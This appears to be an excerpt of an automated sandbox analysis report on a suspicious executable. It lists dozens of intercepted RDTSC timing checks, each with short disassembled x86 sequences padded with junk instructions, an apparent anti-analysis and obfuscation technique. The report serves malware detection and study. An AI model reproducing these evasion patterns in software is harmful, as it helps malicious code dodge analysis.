Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CA46D4 second address: CA46EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CAC1CF second address: CAC1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F1CC8B8C9E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CAC1DE second address: CAC217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jg 00007F1CC8BB7C73h 0x00000010 push ebx 0x00000011 jng 00007F1CC8BB7C36h 0x00000017 pop ebx 0x00000018 pushad 0x00000019 jmp 00007F1CC8BB7C40h 0x0000001e je 00007F1CC8BB7C36h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CB2778 second address: CB27A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8B8C9F0h 0x00000008 jmp 00007F1CC8B8C9F9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CB3D97 second address: CB3D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CB3D9B second address: CB3DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CBC25F second address: CBC268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC5DDF second address: CC5DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC5DE3 second address: CC5DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC5DE7 second address: CC5E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1CC8B8C9EEh 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F1CC8B8C9E6h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC5E01 second address: CC5E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F1CC8BB7C49h 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC5E24 second address: CC5E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9ECh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC5E35 second address: CC5E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC5E3B second address: CC5E48 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC5E48 second address: CC5E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1CC8BB7C36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC4C5E second address: CC4C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F1CC8B8C9F4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CC9861 second address: CC986D instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CC8BB7C3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CCC5DB second address: CCC5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CCC1A2 second address: CCC1A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CCC1A6 second address: CCC1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F1CC8B8C9E6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CCC1B9 second address: CCC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CCC1C6 second address: CCC1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CD5193 second address: CD51D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C47h 0x00000009 pop edi 0x0000000a jmp 00007F1CC8BB7C49h 0x0000000f jbe 00007F1CC8BB7C38h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CD51D7 second address: CD51DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CDC7B3 second address: CDC7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CDC7B7 second address: CDC7C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CE07F6 second address: CE0807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007F1CC8BB7C36h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CE066C second address: CE0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CE0670 second address: CE0690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1CC8BB7C47h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CDB2AC second address: CDB2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CDB2B8 second address: CDB2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CEF04C second address: CEF056 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CEED6C second address: CEED83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: CEED83 second address: CEED88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D085BB second address: D085C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F1CC8BB7C36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0888D second address: D0889E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1CC8B8C9E6h 0x0000000a popad 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D08A78 second address: D08A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D08C1F second address: D08C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9ECh 0x00000009 push edx 0x0000000a pop edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0D0C6 second address: D0D0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F1CC8BB7C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0D0D0 second address: D0D14D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e or edx, dword ptr [ebp+122D2B57h] 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F1CC8B8C9E8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov edx, dword ptr [ebp+122D185Ah] 0x00000036 call 00007F1CC8B8C9E9h 0x0000003b ja 00007F1CC8B8C9FDh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jng 00007F1CC8B8C9E8h 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0D14D second address: D0D152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0D152 second address: D0D158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0E551 second address: D0E571 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8BB7C44h 0x00000008 jmp 00007F1CC8BB7C3Ch 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 je 00007F1CC8BB7C36h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D101F5 second address: D101F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D101F9 second address: D101FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0FDD1 second address: D0FDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1CC8B8C9E6h 0x0000000a ja 00007F1CC8B8CA00h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0FDFE second address: D0FE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1CC8BB7C36h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0FE0C second address: D0FE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F1CC8B8C9E6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: D0FE1B second address: D0FE21 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D004E second address: 53D006A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D006A second address: 53D007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 541057E second address: 54105FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 09128254h 0x00000008 pushfd 0x00000009 jmp 00007F1CC8B8C9EDh 0x0000000e xor eax, 73D5C516h 0x00000014 jmp 00007F1CC8B8C9F1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F1CC8B8C9EEh 0x00000023 push eax 0x00000024 pushad 0x00000025 mov bh, 38h 0x00000027 pushfd 0x00000028 jmp 00007F1CC8B8C9EAh 0x0000002d sbb al, 00000068h 0x00000030 jmp 00007F1CC8B8C9EBh 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ebx, 5EE177D6h 0x00000040 jmp 00007F1CC8B8C9F7h 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54105FE second address: 541063F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F1CC8BB7C3Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F1CC8BB7C3Dh 0x00000019 push esi 0x0000001a pop edi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 541063F second address: 541065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A00EA second address: 53A014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CC8BB7C3Ch 0x00000011 and cl, 00000028h 0x00000014 jmp 00007F1CC8BB7C3Bh 0x00000019 popfd 0x0000001a jmp 00007F1CC8BB7C48h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F1CC8BB7C3Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A014F second address: 53A016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 1E8B0CA6h 0x00000012 push edx 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0259 second address: 53A0268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0268 second address: 53A0280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53A0280 second address: 53A0284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0DAD second address: 53C0DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0DB1 second address: 53C0DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0DB7 second address: 53C0E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1CC8B8C9ECh 0x00000008 pop eax 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov edi, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1CC8B8C9F2h 0x0000001a xor si, 4C98h 0x0000001f jmp 00007F1CC8B8C9EBh 0x00000024 popfd 0x00000025 mov bx, si 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov bl, al 0x00000030 pushfd 0x00000031 jmp 00007F1CC8B8C9F3h 0x00000036 sbb al, 0000000Eh 0x00000039 jmp 00007F1CC8B8C9F9h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0E33 second address: 53C0E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0992 second address: 53C09BA instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CC8B8C9F2h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1CC8B8C9ECh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C09BA second address: 53C09C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C09C0 second address: 53C09C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C08E8 second address: 53C08EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C08EE second address: 53C08F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C063E second address: 53C0652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C40h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0652 second address: 53C0656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0656 second address: 53C0679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 0003h 0x0000000e movzx esi, di 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1CC8BB7C3Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0679 second address: 53C0680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53C0680 second address: 53C06A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 6131C45Bh 0x00000011 call 00007F1CC8BB7C40h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D041C second address: 53D049F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F1CC8B8C9ECh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F1CC8B8C9EEh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c mov edi, esi 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F1CC8B8C9F6h 0x00000025 sub cl, FFFFFFB8h 0x00000028 jmp 00007F1CC8B8C9EBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F1CC8B8C9F5h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D049F second address: 53D04D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F1CC8BB7C3Ah 0x00000013 jmp 00007F1CC8BB7C45h 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 54104CA second address: 541052C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov cx, dx 0x00000011 pop ebx 0x00000012 mov ecx, 28397137h 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F1CC8B8C9EDh 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 jmp 00007F1CC8B8C9ECh 0x00000025 jmp 00007F1CC8B8C9F2h 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F1CC8B8C9F7h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 541052C second address: 5410544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53E0766 second address: 53E0778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53E0778 second address: 53E077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53E077C second address: 53E0812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F1CC8B8C9F7h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1CC8B8C9F6h 0x00000015 mov eax, dword ptr [ebp+08h] 0x00000018 jmp 00007F1CC8B8C9F0h 0x0000001d and dword ptr [eax], 00000000h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F1CC8B8C9EEh 0x00000027 jmp 00007F1CC8B8C9F5h 0x0000002c popfd 0x0000002d mov edi, ecx 0x0000002f popad 0x00000030 and dword ptr [eax+04h], 00000000h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F1CC8B8C9F9h 0x0000003b rdtsc
